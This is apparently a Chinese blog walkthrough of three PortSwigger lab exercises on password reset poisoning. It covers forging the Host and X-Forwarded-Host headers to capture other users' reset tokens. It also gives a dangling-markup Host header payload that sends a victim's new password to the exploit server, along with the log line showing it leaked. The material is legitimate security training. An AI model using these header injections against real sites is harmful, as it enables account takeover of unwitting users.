Web Security Academy:密码重置漏洞

Web Security Academy的密码重置漏洞

地址: https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning

第一题 Lab: Basic password reset poisoning

这里给了一个用户名和密码,要求改另外一个人的密码。

开始,我们用自己的账号走一遍忘记密码的流程

在exploit server中,可以修改response,还有mail client,可以进入自己的邮箱。

登陆框点忘记密码,填入自己的用户名,邮箱收到重置邮件。可以看到这个邮件有个token,forgot-password?temp-forgot,应该是验证用户的token。

要想修改其他用户的密码就需要拿到这个token

我们对忘记密码处抓包

发现host随意改也可以发送成功,用自己的账号看看效果。

查看邮件,可以看到我们可以控制重置的链接

可以完整控制整个URL的前半部分

收到的token

那把收到的重置URL中的token换了,就可以改carlos的密码, 然后使用用户名和密码就可以的登录,完成这个实验。

第二题 Lab: Password reset poisoning via middleware

添加X-Forwarded-Host头,让这个头字段的值为你的测试服务器,让受害者点击,得到受害者的token

第三题 Lab: Password reset poisoning via dangling markup

提示:

发现,现在发邮件,都是直接重置密码,并且给了登录链接。

邮件的原文本:

Sent: 2020-10-22 02:01:08 +0000 From: no-reply@acd91f5a1f54ee6e8001093a0023008b.web-security-academy.net To: wiener@aca71f321fd0ee2980b109e801d2000c.web-security-academy.net Subject: Account recovery

<p>Hello!</p><p>Please <a href='https://acd91f5a1f54ee6e8001093a0023008b.web-security-academy.net/login'>click here</a> to login with your new password: ioktQ4hK0q</p><p>Thanks,<br/>Support team</p><i>This email has been scanned by the MacCarthy Email Security service</i>

看看哪里有可以控制的输入? 这个链接?提示说会扫描链接,那只能修改链接。 修改host的值报错,直接跟一段字符,发现不报错

收到的邮件里面,也存在这一段字符,那找到了这个输入点。

<p>Hello!</p><p>Please <a href='https://acd91f5a1f54ee6e8001093a0023008b.web-security-academy.net:pxiaoer/login'>click here</a> to login with your new password: O2j49KvAgi</p><p>Thanks,<br/>Support team</p><i>This email has been scanned by the MacCarthy Email Security service</i>


把host修改为:
Host: acd91f5a1f54ee6e8001093a0023008b.web-security-academy.net:https:'<a href="//aca71f321fd0ee2980b109e801d2000c.web-security-academy.net/?

去修改其他用户的密码,在日志中找到了扫描器的访问记录,里面带了密码。

172.31.31.238 2020-10-22 02:32:57 +0000 "GET /?/login'>click+here</a>+to+login+with+your+new+password:+Fm91ZSIfei</p><p>Thanks,<br/>Support+team</p><i>This+email+has+been+scanned+by+the+MacCarthy+Email+Security+service</i> HTTP/1.1" 302

这样第三题也解决了。

Web Security Academy靶场进度:

Web Security Academy:密码重置漏洞”的一个响应

发表评论

Fill in your details below or click an icon to log in:

WordPress.com 徽标

您正在使用您的 WordPress.com 账号评论。 注销 /  更改 )

Google photo

您正在使用您的 Google 账号评论。 注销 /  更改 )

Twitter picture

您正在使用您的 Twitter 账号评论。 注销 /  更改 )

Facebook photo

您正在使用您的 Facebook 账号评论。 注销 /  更改 )

Connecting to %s